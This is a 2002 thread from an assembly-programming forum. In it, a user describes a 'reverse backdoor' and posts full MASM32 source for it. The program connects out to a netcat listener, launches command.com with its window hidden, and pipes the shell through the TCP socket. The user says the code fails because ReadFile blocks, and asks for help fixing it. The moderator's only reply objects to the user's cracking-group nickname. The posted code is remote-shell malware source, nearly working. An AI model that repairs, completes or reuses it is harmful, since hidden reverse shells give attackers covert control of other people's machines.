Hi, I'm trying to create a program that connects to
a listening program e.g. netcat over tcp and displays a command.com shell on it. A bit like a reverse backdoor.
I tried to do it like this:
create a socket, connect it to the netcat server,
start 2 threads, they both create an anonymous pipe,
but one only uses the write handle to write commands
to command.com that it recv's from the socket.
The other one constantly uses its read handle to read
from command.com and puts it on the socket.
After these threads are started I createprocess
command.com with the pipe handles.
Then I make the main thread wait forever and let the
2 worker threads to their stuff.
It's really simply but it doesn't work. The only thing
I soft ice tells me is that the readfile call that's supposed
to retreive something like
"Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.

C:\WINDOWS\desktop>"
never returns...
I think that's the problem, but I don't know how to fix it.
I hope somebody more experienced can help me, I'd
really appreciate it. Greetz, Phr0zen
Posted on 2002-02-08 13:59:40 by Phr0zen@mail.be
I dunno your policies about posting sources, but maybe it could help finding my prob...
I hope it doesn't look ****** up...



.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\wsock32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\masm32.lib

SendStuff PROTO :dword
ReceiveStuff PROTO :dword

.data
CreatePipeError db "Error during pipe creation",0
CreateProcessError db "Error during process creation",0
;thread1 db "thread 1 started!",0
;thread2 db "thread 2 started!",0
sockerror db "could not connect!",0
CommandLine db "command.com",0
Port_s db "8887",0
IP db "127.0.0.1",0
flag1 db 0
flag2 db 0

.data?
hRead dd ?
hWrite dd ?
startupinfo STARTUPINFO <>
pinfo PROCESS_INFORMATION <>
wsadata WSADATA <>
sock dd ?
sin sockaddr_in <>
Port dd ?
threadid1 dd ?
threadid2 dd ?

.code
start:
invoke WSAStartup,101h,addr wsadata
@@:
invoke socket,AF_INET,SOCK_STREAM,0
.IF eax == INVALID_SOCKET
jmp @B
.ENDIF
mov sock,eax
invoke atodw,addr Port_s
mov Port,eax
invoke htons,Port
mov sin.sin_port,ax
mov sin.sin_family,AF_INET
invoke inet_addr,addr IP
mov sin.sin_addr,eax
serror:
invoke connect,sock,addr sin,sizeof sin
.if eax == SOCKET_ERROR
invoke MessageBox, NULL, addr sockerror,addr sockerror, MB_OK
jmp serror
.endif
invoke CreateThread,NULL,NULL,addr SendStuff,NULL,NULL,addr threadid1
invoke CloseHandle, eax
invoke CreateThread,NULL,NULL,addr ReceiveStuff,NULL,NULL,addr threadid2
invoke CloseHandle, eax
@@:
invoke Sleep, 250
mov al, flag1
mov bl, flag2
test al, bl
jz @B ;wait till the threads to have launched their pipes
mov startupinfo.cb,sizeof STARTUPINFO
invoke GetStartupInfo,addr startupinfo
mov eax, hWrite
mov startupinfo.hStdOutput,eax
mov startupinfo.hStdError,eax
mov eax, hRead
mov startupinfo.hStdInput,eax
mov startupinfo.dwFlags,STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
mov startupinfo.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,addr CommandLine,NULL,NULL,TRUE,NULL,NULL,NULL,addr startupinfo,addr pinfo
.if eax==NULL
invoke MessageBox,NULL,addr CreateProcessError,addr CreateProcessError,MB_ICONERROR+MB_OK
.else
@@:
invoke SleepEx, -1, FALSE
jmp @B
.endif

SendStuff PROC tsjing:DWORD
LOCAL bytesRead:DWORD
LOCAL bla:DWORD
LOCAL sat:SECURITY_ATTRIBUTES
LOCAL buffer[1024]:BYTE
; invoke MessageBox, NULL, addr thread1,addr thread1, MB_OK
mov sat.nLength,sizeof SECURITY_ATTRIBUTES
mov sat.lpSecurityDescriptor,NULL
mov sat.bInheritHandle,TRUE
invoke CreatePipe,addr hRead,addr bla,addr sat,NULL
mov flag1, TRUE
readNsend:
invoke Sleep, 250
invoke RtlZeroMemory,addr buffer,1024
invoke ReadFile,hRead,addr buffer,1023,addr bytesRead,NULL
.if eax != FALSE
invoke send,sock,addr buffer,bytesRead,0
.endif
jmp readNsend
ret
SendStuff ENDP

ReceiveStuff PROC tsjang:DWORD
LOCAL bytesWritten:DWORD
LOCAL bla:DWORD
LOCAL sat:SECURITY_ATTRIBUTES
LOCAL buffer[1024]:BYTE
LOCAL bytesToWrite:DWORD
; invoke MessageBox, NULL, addr thread2,addr thread2, MB_OK
mov sat.nLength,sizeof SECURITY_ATTRIBUTES
mov sat.lpSecurityDescriptor,NULL
mov sat.bInheritHandle,TRUE
invoke CreatePipe,addr bla,addr hWrite,addr sat,NULL
mov flag2, TRUE
receiveNwrite:
invoke Sleep, 250
invoke RtlZeroMemory,addr buffer,sizeof buffer
invoke recv,sock,addr buffer,sizeof buffer,0
.if eax != NULL
invoke WriteFile,hWrite,addr buffer,bytesToWrite,addr bytesWritten,NULL
.endif
jmp receiveNwrite
ret
ReceiveStuff ENDP

end start

Just added the formatting options so it was easier to read.
Posted on 2002-02-08 14:01:58 by Phr0zen@mail.be
Phr0zen,

Don't use this nick in here again, someone may think the forum supports PC which it does not.

Register with a nick that does not associate itself with any particular group.

Regards,

hutch@movsd.com
Posted on 2002-02-08 18:22:19 by hutch--